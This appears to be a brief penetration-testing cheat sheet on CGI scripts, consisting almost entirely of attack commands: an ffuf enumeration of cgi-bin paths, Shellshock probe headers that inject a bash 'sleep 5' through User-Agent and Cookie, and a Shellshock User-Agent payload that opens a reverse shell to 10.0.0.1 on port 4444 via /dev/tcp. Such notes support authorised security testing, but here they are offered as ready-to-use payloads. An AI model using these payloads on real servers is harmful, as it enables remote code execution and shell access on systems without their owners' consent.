CGI Pentesting
Enumeration CGI Scripts
ffuf -u https://example.com/cgi-bin/FUZZ.cgi -w wordlist.txtShellshock
GET /cgi-bin/example.cgi HTTP/1.1
User-Agent: () { :; }; /bin/bash -c "sleep 5"
Cookie: () { :; }; /bin/bash -c "sleep 5"
# Reverse Shell
User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"Last updated